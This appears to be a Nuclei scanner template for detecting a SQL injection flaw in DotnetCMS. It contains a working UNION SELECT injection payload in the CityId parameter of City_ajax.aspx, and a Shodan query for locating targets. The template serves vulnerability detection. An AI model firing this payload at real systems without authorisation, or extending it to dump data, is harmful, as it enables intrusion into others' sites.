id: dotnetcms-sqli
info:
  name: DotnetCMS SQLi
  author: ritikchaddha
  severity: high
  metadata:
    verified: true
    shodan-query: http.html:"dotnetcms"
  reference:
    - https://www.cnblogs.com/rebeyond/p/4951418.html
    - http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0150742
  tags: dotnetcms,dotnet,sqli
requests:
  - method: GET
    path:
      - "{{BaseURL}}/user/City_ajax.aspx?CityId=33'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','{{randstr}}')),2--"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5("{{randstr}}")}}'
      - type: status
        status:
          - 200
